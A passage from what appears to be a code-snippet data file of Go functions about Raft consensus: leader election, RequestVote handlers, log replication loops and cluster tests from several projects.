%v, want %v\", i, msgs, wmsgs)\n\t\t}\n\t}\n}", "func Make(peers []*labrpc.ClientEnd, me int,\n persister *Persister, applyCh chan ApplyMsg) *Raft {\n rf := &Raft{}\n rf.peers = peers\n rf.persister = persister\n rf.me = me\n\n // Your initialization code here (2A, 2B, 2C).\n rf.state = StateFollower\n rf.commitIndex = 0\n rf.votedFor = nilIndex\n rf.lastApplied = 0\n rf.currentTerm = 0\n // rf.log contains a dummy head\n rf.log = []LogEntry{LogEntry{rf.currentTerm, nil}}\n\n // initialize from state persisted before a crash\n rf.readPersist(persister.ReadRaftState())\n\n rf.print(\"Initialize\")\n // All servers\n go func() {\n for {\n if rf.isKilled {\n return\n }\n rf.mu.Lock()\n for rf.commitIndex > rf.lastApplied {\n rf.lastApplied++\n applyMsg := ApplyMsg{rf.lastApplied, rf.log[rf.lastApplied].Command, false, nil}\n applyCh <- applyMsg\n rf.print(\"applied log entry %d:%v\", rf.lastApplied, rf.log[rf.lastApplied])\n // Apply rf.log[lastApplied] into its state machine\n }\n rf.mu.Unlock()\n time.Sleep(50 * time.Millisecond)\n }\n }()\n\n // candidate thread\n go func() {\n var counterLock sync.Mutex\n for {\n if rf.isKilled {\n return\n }\n rf.mu.Lock()\n\t\t\tif rf.state == StateFollower { // ONLY follower would have election timeout\n\t\t\t\trf.state = StateCandidate\n\t\t\t}\n rf.mu.Unlock()\n duration := time.Duration(electionTimeout +\n Random(-electionRandomFactor, electionRandomFactor))\n time.Sleep(duration * time.Millisecond)\n rf.mu.Lock()\n\n if rf.state == StateCandidate {\n rf.print(\"start to request votes for term %d\", rf.currentTerm+1)\n counter := 0\n logLen := len(rf.log)\n lastTerm := 0\n lastIndex := logLen-1\n requestTerm := rf.currentTerm+1\n if logLen > 0 {\n lastTerm = rf.log[logLen-1].Term\n }\n rvArgs := RequestVoteArgs{requestTerm, rf.me, lastIndex, lastTerm}\n rvReplies := make([]RequestVoteReply, len(rf.peers))\n\n for index := range rf.peers {\n go func(index int) {\n ok := rf.sendRequestVote(index, &rvArgs, &rvReplies[index])\n rf.mu.Lock()\n if rvReplies[index].Term > rf.currentTerm {\n rf.currentTerm = rvReplies[index].Term\n rf.state = StateFollower\n rf.persist()\n }else if ok && (rvArgs.Term == rf.currentTerm) && rvReplies[index].VoteGranted {\n counterLock.Lock()\n counter++\n if counter > len(rf.peers)/2 && rf.state != StateLeader {\n rf.state = StateLeader\n rf.currentTerm = requestTerm\n rf.nextIndex = make([]int, len(rf.peers))\n rf.matchIndex = make([]int, len(rf.peers))\n // immediately send heartbeats to others to stop election\n for i := range rf.peers {\n rf.nextIndex[i] = len(rf.log)\n }\n rf.persist()\n\n rf.print(\"become leader for term %d, nextIndex = %v, rvArgs = %v\", rf.currentTerm, rf.nextIndex, rvArgs)\n }\n counterLock.Unlock()\n }\n rf.mu.Unlock()\n }(index)\n }\n }\n rf.mu.Unlock()\n }\n }()\n\n // leader thread\n go func(){\n for {\n if rf.isKilled {\n return\n }\n time.Sleep(heartbeatTimeout * time.Millisecond)\n rf.mu.Lock()\n // send AppendEntries(as heartbeats) RPC\n if rf.state == StateLeader {\n currentTerm := rf.currentTerm\n for index := range rf.peers {\n go func(index int) {\n // decrease rf.nextIndex[index] in loop till append success\n for {\n if index == rf.me || rf.state != StateLeader {\n break\n }\n // if rf.nextIndex[index] <= 0 || rf.nextIndex[index] > len(rf.log){\n // rf.print(\"Error: rf.nextIndex[%d] = %d, logLen = %d\", index, rf.nextIndex[index], len(rf.log))\n // }\n rf.mu.Lock()\n logLen := len(rf.log)\n appendEntries := rf.log[rf.nextIndex[index]:]\n prevIndex := rf.nextIndex[index]-1\n aeArgs := AppendEntriesArgs{currentTerm, rf.me,\n prevIndex, rf.log[prevIndex].Term,\n appendEntries, rf.commitIndex}\n aeReply := AppendEntriesReply{}\n rf.mu.Unlock()\n\n ok := rf.sendAppendEntries(index, &aeArgs, &aeReply)\n rf.mu.Lock()\n if ok && rf.currentTerm == aeArgs.Term { // ensure the reply is not outdated\n if aeReply.Success {\n rf.matchIndex[index] = logLen-1\n rf.nextIndex[index] = logLen\n rf.mu.Unlock()\n break\n }else {\n if aeReply.Term > rf.currentTerm { // this leader node is outdated\n rf.currentTerm = aeReply.Term\n rf.state = StateFollower\n rf.persist()\n rf.mu.Unlock()\n break\n }else{ // prevIndex not match, decrease prevIndex\n // rf.nextIndex[index]--\n // if aeReply.ConflictFromIndex <= 0 || aeReply.ConflictFromIndex >= logLen{\n // rf.print(\"Error: aeReply.ConflictFromIndex from %d = %d, logLen = %d\", aeReply.ConflictFromIndex, index, logLen)\n // }\n rf.nextIndex[index] = aeReply.ConflictFromIndex\n }\n }\n }\n rf.mu.Unlock()\n }\n }(index)\n }\n\n // Find logs that has appended to majority and update commitIndex\n for N := rf.commitIndex+1; N<len(rf.log); N++ {\n // To eliminate problems like the one in Figure 8,\n // Raft never commits log entries from previous terms by count- ing replicas. \n if rf.log[N].Term < rf.currentTerm{\n continue\n }else if rf.log[N].Term > rf.currentTerm{\n break\n }\n followerHas := 0\n for index := range rf.peers {\n if rf.matchIndex[index] >= N{\n followerHas++\n }\n }\n // If majority has the log entry of index N\n if followerHas > len(rf.peers) / 2 {\n rf.print(\"set commitIndex to %d, matchIndex = %v\", N, rf.matchIndex)\n rf.commitIndex = N\n }\n }\n }\n rf.mu.Unlock()\n }\n }()\n\n return rf\n}", "func TestCandidateFallback(t *testing.T) {\n\ttests := []pb.Message{\n\t\t{From: 2, To: 1, Term: 1, Type: pb.MsgApp},\n\t\t{From: 2, To: 1, Term: 2, Type: pb.MsgApp},\n\t}\n\tfor i, tt := range tests {\n\t\tr := newTestRaft(1, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\t\tdefer closeAndFreeRaft(r)\n\t\tr.Step(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\t\tif r.state != StateCandidate {\n\t\t\tt.Fatalf(\"unexpected state = %s, want %s\", r.state, StateCandidate)\n\t\t}\n\n\t\tr.Step(tt)\n\n\t\tif g := r.state; g != StateFollower {\n\t\t\tt.Errorf(\"#%d: state = %s, want %s\", i, g, StateFollower)\n\t\t}\n\t\tif g := r.Term; g != tt.Term {\n\t\t\tt.Errorf(\"#%d: term = %d, want %d\", i, g, tt.Term)\n\t\t}\n\t}\n}", "func (c *testCluster) triggerElection(nodeIndex int, groupID roachpb.RangeID) {\n\tif err := c.nodes[nodeIndex].multiNode.Campaign(context.Background(), uint64(groupID)); err != nil {\n\t\tc.t.Fatal(err)\n\t}\n}", "func TestRaft1(t *testing.T) {\n\n\t//Remove any state recovery files\n\tfor i := 0; i < 5; i++ {\n\t\tos.Remove(fmt.Sprintf(\"%s_S%d.state\", raft.FILENAME, i))\n\t}\n\n\tgo main() //Starts all servers\n\n\tvar leaderId1, leaderId2 int\n\tack := make(chan bool)\n\n\ttime.AfterFunc(1*time.Second, func() {\n\t\tcheckIfLeaderExist(t)\n\t\tleaderId1 = raft.KillLeader() //Kill leader\n\t\tlog.Print(\"Killed leader:\", leaderId1)\n\t})\n\n\ttime.AfterFunc(2*time.Second, func() {\n\t\tcheckIfLeaderExist(t)\n\t\tleaderId2 = raft.KillLeader() //Kill current leader again\n\t\tlog.Print(\"Killed leader:\", leaderId2)\n\t})\n\n\ttime.AfterFunc(3*time.Second, func() {\n\t\tcheckIfLeaderExist(t)\n\t\traft.ResurrectServer(leaderId2) //Resurrect last killed as follower\n\t\tlog.Print(\"Resurrected previous leader:\", leaderId2)\n\t})\n\n\ttime.AfterFunc(4*time.Second, func() {\n\t\tcheckIfLeaderExist(t)\n\t\traft.ResurrectServerAsLeader(leaderId1) //Ressurect first one as leader\n\t\tlog.Print(\"Resurrected previous leader:\", leaderId1)\n\t})\n\n\ttime.AfterFunc(5*time.Second, func() {\n\t\tcheckIfLeaderExist(t)\n\t\tack <- true\n\t})\n\n\t<-ack\n}", "func TestStatsConnTopoNewLeaderParticipation(t *testing.T) {\n\tconn := &fakeConn{}\n\tstatsConn := NewStatsConn(\"global\", conn)\n\n\t_, _ = statsConn.NewLeaderParticipation(\"\", \"\")\n\ttimingCounts := topoStatsConnTimings.Counts()[\"NewLeaderParticipation.global\"]\n\tif got, want := timingCounts, int64(1); got != want {\n\t\tt.Errorf(\"stats were not properly recorded: got = %d, want = %d\", got, want)\n\t}\n\n\t// error is zero before getting an error\n\terrorCount := topoStatsConnErrors.Counts()[\"NewLeaderParticipation.global\"]\n\tif got, want := errorCount, int64(0); got != want {\n\t\tt.Errorf(\"stats were not properly recorded: got = %d, want = %d\", got, want)\n\t}\n\n\t_, _ = statsConn.NewLeaderParticipation(\"error\", \"\")\n\n\t// error stats gets emitted\n\terrorCount = topoStatsConnErrors.Counts()[\"NewLeaderParticipation.global\"]\n\tif got, want := errorCount, int64(1); got != want {\n\t\tt.Errorf(\"stats were not properly recorded: got = %d, want = %d\", got, want)\n\t}\n}", "func TestRaftNetworkPartition(t *testing.T) {\n\tID1 := \"1\"\n\tID2 := \"2\"\n\tID3 := \"3\"\n\tclusterPrefix := \"TestRaftNetworkPartition\"\n\n\t// Create n1 node.\n\tfsm1 := newTestFSM(ID1)\n\tcfg := getTestConfig(ID1, clusterPrefix+ID1)\n\tcfg.LeaderStepdownTimeout = cfg.FollowerTimeout\n\tn1 := testCreateRaftNode(cfg, newStorage())\n\n\t// Create n2 node.\n\tfsm2 := newTestFSM(ID2)\n\tcfg = getTestConfig(ID2, clusterPrefix+ID2)\n\tcfg.LeaderStepdownTimeout = cfg.FollowerTimeout\n\tn2 := testCreateRaftNode(cfg, newStorage())\n\n\t// Create n3 node.\n\tfsm3 := newTestFSM(ID3)\n\tcfg = getTestConfig(ID3, clusterPrefix+ID3)\n\tcfg.LeaderStepdownTimeout = cfg.FollowerTimeout\n\tn3 := testCreateRaftNode(cfg, newStorage())\n\n\tconnectAllNodes(n1, n2, n3)\n\tn1.transport = NewMsgDropper(n1.transport, 193, 0)\n\tn2.transport = NewMsgDropper(n2.transport, 42, 0)\n\tn3.transport = NewMsgDropper(n3.transport, 111, 0)\n\n\tn1.Start(fsm1)\n\tn2.Start(fsm2)\n\tn3.Start(fsm3)\n\tn3.ProposeInitialMembership([]string{ID1, ID2, ID3})\n\n\t// Find out who leader is.\n\tvar leader *Raft\n\tvar follower1, follower2 *Raft\n\tselect {\n\tcase <-fsm1.leaderCh:\n\t\tleader = n1\n\t\tfollower1 = n2\n\t\tfollower2 = n3\n\tcase <-fsm2.leaderCh:\n\t\tleader = n2\n\t\tfollower1 = n1\n\t\tfollower2 = n3\n\tcase <-fsm3.leaderCh:\n\t\tleader = n3\n\t\tfollower1 = n1\n\t\tfollower2 = n2\n\t}\n\n\t// Propose a command on the leader.\n\tpending := leader.Propose([]byte(\"I'm data1\"))\n\t<-pending.Done\n\tif pending.Err != nil {\n\t\tt.Fatalf(\"Failed to propose command on leader side: %v\", pending.Err)\n\t}\n\n\t// Isolate the leader with follower1.\n\tleader.transport.(*msgDropper).Set(follower1.config.ID, 1)\n\tfollower1.transport.(*msgDropper).Set(leader.config.ID, 1)\n\t// Isolate the leader with follower2.\n\tleader.transport.(*msgDropper).Set(follower2.config.ID, 1)\n\tfollower2.transport.(*msgDropper).Set(leader.config.ID, 1)\n\n\t// Propose a second command on the partitioned leader.\n\tpending = leader.Propose([]byte(\"I'm data2\"))\n\n\t// Wait a new leader gets elected on the other side of the partition.\n\tvar newLeader *Raft\n\tselect {\n\tcase <-follower1.fsm.(*testFSM).leaderCh:\n\t\tnewLeader = follower1\n\tcase <-follower2.fsm.(*testFSM).leaderCh:\n\t\tnewLeader = follower2\n\t}\n\n\t// The partitioned leader should step down at some point and conclude the\n\t// command proposed after the network partition with 'ErrNotLeaderAnymore'.\n\t<-pending.Done\n\tif pending.Err != ErrNotLeaderAnymore {\n\t\tt.Fatalf(\"expected 'ErrNotLeaderAnymore' for the command proposed on partitioned leader\")\n\t}\n\n\t// Propose a new command on the newly elected leader, it should succeed.\n\tpending = newLeader.Propose([]byte(\"I'm data3\"))\n\t<-pending.Done\n\tif pending.Err != nil {\n\t\tt.Fatalf(\"Failed to propose on new leader side: %v\", pending.Err)\n\t}\n\n\t// Reconnect old leader and previous follower 1.\n\tleader.transport.(*msgDropper).Set(follower1.config.ID, 0)\n\tfollower1.transport.(*msgDropper).Set(leader.config.ID, 0)\n\t// Reconnect old leader and previous follower 2.\n\tleader.transport.(*msgDropper).Set(follower2.config.ID, 0)\n\tfollower2.transport.(*msgDropper).Set(leader.config.ID, 0)\n\n\t// At some point the old leader should join the new quorum and gets synced\n\t// from the new leader.\n\ttestEntriesEqual(\n\t\tleader.fsm.(*testFSM).appliedCh,\n\t\tnewLeader.fsm.(*testFSM).appliedCh, 2,\n\t)\n}", "func (rf *Raft) RequestVote(args *RequestVoteArgs, reply *RequestVoteReply) {\n DPrintf(\"%d: %d recieve RequestVote from %d:%d\\n\", rf.currentTerm, rf.me, args.Term, args.Candidate)\n // Your code here (2A, 2B).\n rf.mu.Lock()\n defer rf.mu.Unlock()\n if args.Term < rf.currentTerm {\n \n reply.VoteGranted = false\n reply.Term = rf.currentTerm\n DPrintf(\"%d: %d recieve voteRequest from %d:%d %v\\n\", rf.currentTerm, rf.me, args.Term, args.Candidate, reply.VoteGranted)\n return\n }\n\n if args.Term > rf.currentTerm {\n rf.votedFor = -1\n rf.currentTerm = args.Term\n }\n\n if rf.votedFor == -1 || rf.votedFor == args.Candidate {\n // election restriction\n if args.LastLogTerm < rf.log[len(rf.log) - 1].Term ||\n (args.LastLogTerm == rf.log[len(rf.log) - 1].Term &&\n args.LastLogIndex < len(rf.log) - 1) {\n rf.votedFor = -1\n reply.VoteGranted = false\n DPrintf(\"%d: %d recieve voteRequest from %d:%d %v\\n\", rf.currentTerm, rf.me, args.Term, args.Candidate, reply.VoteGranted)\n return\n }\n\n \n if rf.state == FOLLOWER {\n rf.heartbeat <- true\n }\n rf.state = FOLLOWER\n rf.resetTimeout()\n rf.votedFor = args.Candidate\n\n \n reply.VoteGranted = true\n reply.Term = args.Term\n DPrintf(\"%d: %d recieve voteRequest from %d:%d %v\\n\", rf.currentTerm, rf.me, args.Term, args.Candidate, reply.VoteGranted)\n return\n }\n reply.VoteGranted = false\n reply.Term = args.Term\n DPrintf(\"%d: %d recieve voteRequest from %d:%d %v\\n\", rf.currentTerm, rf.me, args.Term, args.Candidate, reply.VoteGranted)\n}", "func TestRaft2(t *testing.T) {\n\tack := make(chan bool)\n\n\tleader := raft.GetLeaderId()\n\n\t//Kill some one who is not a leader\n\ts1 := (leader + 1) % 5\n\traft.KillServer(s1)\n\tt.Log(\"Killed \", s1)\n\n\t//Once more\n\ts2 := (s1 + 1) % 5\n\traft.KillServer(s2)\n\tt.Log(\"Killed \", s2)\n\n\t//Kill leader now\n\tleader = raft.KillLeader()\n\n\t//Make sure new leader doesn't get elected\n\ttime.AfterFunc(1*time.Second, func() {\n\t\tleaderId := raft.GetLeaderId()\n\t\tif leaderId != -1 {\n\t\t\tt.Error(\"Leader should not get elected!\")\n\t\t}\n\t\tack <- true\n\t})\n\t<-ack\n\n\t//Resurrect for next test cases\n\traft.ResurrectServer(leader)\n\traft.ResurrectServer(s1)\n\traft.ResurrectServer(s2)\n\n\t//Wait for 1 second for new leader to get elected\n\ttime.AfterFunc(1*time.Second, func() { ack <- true })\n\t<-ack\n}", "func TestLeaderTransferToUpToDateNode(t *testing.T) {\n\tnt := newNetwork(nil, nil, nil)\n\tdefer nt.closeAll()\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\n\tlead := nt.peers[1].(*raft)\n\n\tif lead.lead != 1 {\n\t\tt.Fatalf(\"after election leader is %x, want 1\", lead.lead)\n\t}\n\n\t// Transfer leadership to 2.\n\tnt.send(pb.Message{From: 2, To: 1, Type: pb.MsgTransferLeader})\n\n\tcheckLeaderTransferState(t, lead, StateFollower, 2)\n\n\t// After some log replication, transfer leadership back to 1.\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgProp, Entries: []pb.Entry{{}}})\n\n\tnt.send(pb.Message{From: 1, To: 2, Type: pb.MsgTransferLeader})\n\n\tcheckLeaderTransferState(t, lead, StateLeader, 1)\n}", "func (rf *Raft) tryToBeLeader() {\n\t//Step 1\n\tvar maxVoteNum, currentSuccessNum int\n\trf.mu.Lock()\n\trf.currentTerm++\n\trf.votedFor = rf.me\n\trf.role = Candidate\n\tmaxVoteNum = len(rf.peers)\n\trf.mu.Unlock()\n\trf.persist()\n\n\tcurrentSuccessNum = 1\n\tvar mutex sync.Mutex\n\tfor i := 0; i < maxVoteNum; i++ {\n\t\tif i != rf.me {\n\t\t\tgo func(idx int) {\n\t\t\t\tvar templateArgs RequestVoteArgs\n\t\t\t\trf.mu.Lock()\n\t\t\t\taLeaderComeUp := rf.role == Follower || rf.role == Leader\n\n\t\t\t\tif aLeaderComeUp {\n\t\t\t\t\trf.mu.Unlock()\n\t\t\t\t\treturn\n\t\t\t\t}\n\t\t\t\ttemplateArgs.Term = rf.currentTerm\n\t\t\t\ttemplateArgs.CandidateID = rf.me\n\t\t\t\ttemplateArgs.LastLogTerm = rf.logs[len(rf.logs)-1].Term\n\t\t\t\ttemplateArgs.LastLogIndex = len(rf.logs) - 1\n\t\t\t\trf.mu.Unlock()\n\n\t\t\t\targs := templateArgs\n\t\t\t\tvar reply RequestVoteReply\n\t\t\t\tok := rf.sendRequestVote(idx, &args, &reply)\n\n\t\t\t\trf.mu.Lock()\n\t\t\t\taLeaderComeUp = rf.role == Follower || rf.role == Leader || rf.role == None\n\t\t\t\trf.mu.Unlock()\n\t\t\t\tif aLeaderComeUp {\n\t\t\t\t\treturn\n\t\t\t\t} else {\n\t\t\t\t\tif ok {\n\t\t\t\t\t\tmutex.Lock()\n\t\t\t\t\t\tcurrentSuccessNum++\n\t\t\t\t\t\tmutex.Unlock()\n\t\t\t\t\t\tif currentSuccessNum >= maxVoteNum/2+1 {\n\t\t\t\t\t\t\trf.mu.Lock()\n\t\t\t\t\t\t\trf.role = Leader\n\t\t\t\t\t\t\tfor i := 0; i < len(rf.peers); i++ {\n\t\t\t\t\t\t\t\trf.nextIndex[i] = len(rf.logs)\n\t\t\t\t\t\t\t\trf.matchIndex[i] = 0\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\trf.mu.Unlock()\n\t\t\t\t\t\t\tgo rf.logDuplicate()\n\t\t\t\t\t\t\trf.msgChan <- BecomeLeader\n\t\t\t\t\t\t\treturn\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}(i)\n\t\t}\n\t}\n\n}", "func Make(peers []*labrpc.ClientEnd, me int,\n persister *Persister, applyCh chan ApplyMsg) *Raft {\n rf := &Raft{}\n rf.peers = peers\n rf.persister = persister\n rf.me = me\n rf.applyCh = applyCh\n\n // Your initialization code here (2A, 2B, 2C).\n rf.dead = 0\n\n rf.currentTerm = 0\n rf.votedFor = -1\n rf.commitIndex = -1\n rf.lastApplied = -1\n rf.state = Follower\n rf.gotHeartbeat = false\n\n // initialize from state persisted before a crash\n rf.readPersist(persister.ReadRaftState())\n\n // Start Peer State Machine\n go func() {\n // Run forver\n for {\n \n if rf.killed() {\n fmt.Printf(\"*** Peer %d term %d: I have been terminated. Bye.\",rf.me, rf.currentTerm)\n return \n }\n \n rf.mu.Lock()\n state := rf.state\n rf.mu.Unlock()\n \n switch state {\n case Follower:\n fmt.Printf(\"-- peer %d term %d, status update: I am follolwer.\\n\",rf.me, rf.currentTerm)\n snoozeTime := rand.Float64()*(RANDOM_TIMER_MAX-RANDOM_TIMER_MIN) + RANDOM_TIMER_MIN\n fmt.Printf(\" peer %d term %d -- follower -- : Set election timer to time %f\\n\", rf.me, rf.currentTerm, snoozeTime)\n time.Sleep(time.Duration(snoozeTime) * time.Millisecond) \n \n rf.mu.Lock() \n fmt.Printf(\" peer %d term %d -- follower -- : my election timer had elapsed.\\n\",rf.me, rf.currentTerm)\n if (!rf.gotHeartbeat) {\n fmt.Printf(\"-> Peer %d term %d -- follower --: did not get heartbeat during the election timer. Starting election!\\n\",rf.me, rf.currentTerm) \n rf.state = Candidate\n }\n rf.gotHeartbeat = false\n rf.mu.Unlock()\n \n\n case Candidate:\n rf.mu.Lock()\n rf.currentTerm++\n fmt.Printf(\"-- peer %d: I am candidate! Starting election term %d\\n\",rf.me, rf.currentTerm)\n numPeers := len(rf.peers) // TODO: figure out what to with mutex when reading. Atomic? Lock?\n rf.votedFor = rf.me\n rf.mu.Unlock()\n \n voteCount := 1\n var replies = make([]RequestVoteReply, numPeers)\n rf.sendVoteRequests(replies, numPeers)\n\n snoozeTime := rand.Float64()*(RANDOM_TIMER_MAX-RANDOM_TIMER_MIN) + RANDOM_TIMER_MIN\n fmt.Printf(\" peer %d term %d -- candidate -- :Set snooze timer to time %f\\n\", rf.me, rf.currentTerm, snoozeTime)\n time.Sleep(time.Duration(snoozeTime) * time.Millisecond) \n \n rf.mu.Lock()\n fmt.Printf(\" peer %d term %d -- candidate -- :Waking up from snooze to count votes. %f\\n\", rf.me, rf.currentTerm, snoozeTime)\n if (rf.state != Follower) {\n fmt.Printf(\"-> Peer %d term %d -- candidate --: Start Counting votes...\\n\\n\",rf.me, rf.currentTerm)\n \n for id:=0; id < numPeers; id++ {\n if id != rf.me && replies[id].VoteGranted {\n voteCount++\n } \n }\n\n if voteCount > numPeers/2 {\n // Initialize leader nextIndex and match index\n for id:=0; id< (len(rf.peers)-1); id++{\n rf.nextIndex[id] = len(rf.log)\n rf.matchIndex[id] = 0\n }\n\n fmt.Printf(\"-- peer %d candidate: I am elected leader for term %d. voteCount:%d majority_treshold %d\\n\\n\",rf.me,rf.currentTerm, voteCount, numPeers/2)\n rf.state = Leader\n fmt.Printf(\"-> Peer %d leader of term %d: I send first heartbeat round to assert my authority.\\n\\n\",rf.me, rf.currentTerm)\n go rf.sendHeartbeats()\n // sanity check: (if there is another leader in this term then it cannot be get the majority of votes)\n if rf.gotHeartbeat {\n log.Fatal(\"Two leaders won election in the same term!\")\n }\n } else if rf.gotHeartbeat {\n fmt.Printf(\"-- peer %d candidate of term %d: I got heartbeat from a leader. So I step down :) \\n\",rf.me, rf.currentTerm)\n rf.state = Follower\n } else {\n fmt.Printf(\"-- peer %d candidate term %d: Did not have enough votes. Moving to a new election term.\\n\\n\",rf.me,rf.currentTerm)\n } \n } \n rf.mu.Unlock()\n \n\n case Leader:\n fmt.Printf(\"-- Peer %d term %d: I am leader.\\n\\n\",rf.me, rf.currentTerm)\n snoozeTime := (1/HEARTBEAT_RATE)*1000 \n fmt.Printf(\" Leader %d term %d: snooze for %f\\n\", rf.me, rf.currentTerm, snoozeTime)\n \n time.Sleep(time.Duration(snoozeTime) * time.Millisecond)\n \n rf.mu.Lock()\n if rf.state != Follower {\n\n if rf.gotHeartbeat {\n log.Fatal(\"Fatal Error: Have two leaders in the same term!!!\")\n }\n fmt.Printf(\" peer %d term %d --leader-- : I send periodic heartbeat.\\n\",rf.me, rf.currentTerm)\n go rf.sendHeartbeats()\n } \n rf.mu.Unlock()\n\n }\n }\n } ()\n \n\n return rf\n}", "func NewElection(peers ...string) *Election {\n\tvotes := new(Election)\n\tvotes.ballots = make(map[string]bool, len(peers))\n\tfor _, name := range peers {\n\t\tvotes.ballots[name] = false\n\t}\n\treturn votes\n}", "func (rf *Raft) RequestVote(args *RequestVoteArgs, reply *RequestVoteReply) {\n\tDPrintf(\"peer-%d gets a RequestVote RPC.\", rf.me)\n\t// Your code here (2A, 2B).\n\t// First, we need to detect obsolete information\n\trf.mu.Lock()\n\tdefer rf.mu.Unlock()\n\tif args.Term < rf.currentTerm {\n\t\treply.VoteGranted = false\n\t\treply.Term = rf.currentTerm\n\t\treturn\n\t}\n\n\tstepdown := false\n\t// step down and convert to follower, adopt the args.Term\n\tif args.Term > rf.currentTerm {\n\t\trf.currentTerm = args.Term\n\t\told_state := rf.state\n\t\trf.state = Follower\n\t\tif old_state == Leader {\n\t\t\trf.nonleaderCh <- true\n\t\t}\n\t\trf.votedFor = -1\n\t\trf.persist()\n\t\tstepdown = true\n\t}\n\n\t// 5.4.1 Election restriction : if the requester's log isn't more up-to-date than this peer's, don't vote for it.\n\t// check whether the requester's log is more up-to-date.(5.4.1 last paragraph)\n\tif len(rf.log) > 0 { // At first, there's no log entry in rf.log\n\t\tif rf.log[len(rf.log)-1].Term > args.LastLogTerm {\n\t\t\t// this peer's log is more up-to-date than requester's.\n\t\t\treply.VoteGranted = false\n\t\t\treply.Term = rf.currentTerm\n\t\t\treturn\n\t\t} else if rf.log[len(rf.log)-1].Term == args.LastLogTerm {\n\t\t\tif len(rf.log) > args.LastLogIndex {\n\t\t\t\t// this peer's log is more up-to-date than requester's.\n\t\t\t\treply.VoteGranted = false\n\t\t\t\treply.Term = rf.currentTerm\n\t\t\t\treturn\n\t\t\t}\n\t\t}\n\t}\n\n\t// requester's log is more up-to-date than requester's.\n\t// Then, we should check whether this server has voted for another server in the same term\n\tif stepdown {\n\t\trf.resetElectionTimeout()\n\t\t// now we need to reset the election timer.\n\t\trf.votedFor = args.CandidateId // First-come-first-served\n\t\trf.persist()\n\t\treply.VoteGranted = true\n\t\treply.Term = rf.currentTerm\n\t\treturn\n\t}\n\n\t/* Section 5.5 :\n\t * The server may crash after it completing an RPC but before responsing, then it will receive the same RPC again after it restarts.\n\t * Raft RPCs are idempotent, so this causes no harm.\n\t */\n\tif rf.votedFor == -1 || rf.votedFor == args.CandidateId {\n\t\trf.votedFor = args.CandidateId\n\t\trf.persist()\n\t\treply.VoteGranted = true\n\t} else {\n\t\treply.VoteGranted = false // First-come-first-served, this server has voted for another server before.\n\t}\n\treply.Term = rf.currentTerm\n\treturn\n}", "func TestClusterLateJoin(t *testing.T) {\n\tif testing.Short() {\n\t\tt.Skip(\"skipping cluster test in short mode.\")\n\t}\n\tt.Parallel()\n\n\ttc := newTestCluster(t)\n\tdefer tc.tearDown()\n\n\ttc.addSequinses(3)\n\ttc.expectProgression(down, noVersion, v3)\n\n\ttc.makeVersionAvailable(v3)\n\ttc.setup()\n\ttc.startTest()\n\ttime.Sleep(expectTimeout)\n\n\ts := tc.addSequins()\n\ts.makeVersionAvailable(v3)\n\ts.setup()\n\ts.expectProgression(down, v3)\n\ts.startTest()\n\n\ttc.assertProgression()\n}", "func (rf *Raft) RequestVote(args *RequestVoteArgs, reply *RequestVoteReply) {\n\t// Your code here (2A, 2B).\n\tgrantVote := false\n\trf.updateTerm(args.Term) // All servers: if args.Term > rf.currentTerm, set currentTerm, convert to follower\n\n\tswitch rf.state {\n\tcase Follower:\n\t\tif args.Term < rf.currentTerm {\n\t\t\tgrantVote = false\n\t\t} else if rf.votedFor == -1 || rf.votedFor == args.CandidateId {\n\t\t\tif len(rf.logs) == 0 {\n\t\t\t\tgrantVote = true\n\t\t\t\tbreak\n\t\t\t}\n\t\t\tlastLogTerm := rf.logs[len(rf.logs) - 1].Term\n\t\t\tif (lastLogTerm == args.LastLogTerm && len(rf.logs) <= args.LastLogIndex) || lastLogTerm < args.LastLogTerm {\n\t\t\t\tgrantVote = true\n\t\t\t}\n\t\t}\n\tcase Leader:\n\t\t// may need extra operation since the sender might be out-dated\n\tcase Candidate:\n\t\t// reject because rf has already voted for itself since it's in\n\t\t// Candidate state\n\t}\n\n\tif grantVote {\n\t\t// DPrintf(\"Peer %d: Granted RequestVote RPC from %d.(@%s state)\\n\", rf.me, args.CandidateId, rf.state)\n\t\treply.VoteGranted = true\n\t\trf.votedFor = args.CandidateId\n\t\t// reset election timeout\n\t\trf.hasHeartbeat = true\n\t} else {\n\t\t// DPrintf(\"Peer %d: Rejected RequestVote RPC from %d.(@%s state)\\n\", rf.me, args.CandidateId, rf.state)\n\t\treply.VoteGranted = false\n\t}\n\treply.VotersTerm = rf.currentTerm\n\n\t// when deal with cluster member changes, may also need to reject Request\n\t// within MINIMUM ELECTION TIMEOUT\n}", "func (c *Client) LeaderDiscovery() {\n\tdir := c.dir.Election\n\t// self node key\n\tself := fmt.Sprintf(\"%v/%v\", dir, c.address)\n\t// get a list of election nodes\n\tresp, err := c.client.Get(context.Background(), dir, &client.GetOptions{Sort: true})\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\t// leader key and address\n\tvar key, addr string\n\t// current lowest node index\n\tvar idx uint64\n\tif len(resp.Node.Nodes) > 0 {\n\t\tfor _, v := range resp.Node.Nodes {\n\t\t\tif v.Dir {\n\t\t\t\tcontinue\n\t\t\t}\n\t\t\tif idx == 0 || v.CreatedIndex < idx {\n\t\t\t\tkey = v.Key\n\t\t\t\taddr = v.Value\n\t\t\t\tidx = v.CreatedIndex\n\t\t\t}\n\t\t}\n\t}\n\tif key == \"\" || addr == \"\" {\n\t\tfmt.Println(\"# no nodes were found\")\n\t\tc.Lock()\n\t\tc.leader = nil\n\t\tc.Unlock()\n\t} else {\n\t\tleader := &models.Leader{Key: key, Address: addr}\n\t\tif c.leader == nil {\n\t\t\tif leader.Key == self {\n\t\t\t\tfmt.Println(\"# elected as leader\")\n\t\t\t\tc.events <- &models.Event{Type: EventElected, Group: GroupLeader}\n\t\t\t} else {\n\t\t\t\tfmt.Println(\"# elected as worker\")\n\t\t\t\t// do not send any event until leader node is ready\n\t\t\t\tif nodes := c.GetRunningNodes(); len(nodes) > 0 {\n\t\t\t\t\tc.events <- &models.Event{Type: EventElected, Group: GroupWorker}\n\t\t\t\t} else {\n\t\t\t\t\tgo c.WaitForLeader()\n\t\t\t\t}\n\t\t\t}\n\t\t} else if c.leader != nil && leader.Key != c.leader.Key {\n\t\t\tif leader.Key == self {\n\t\t\t\tfmt.Println(\"# re-elected as 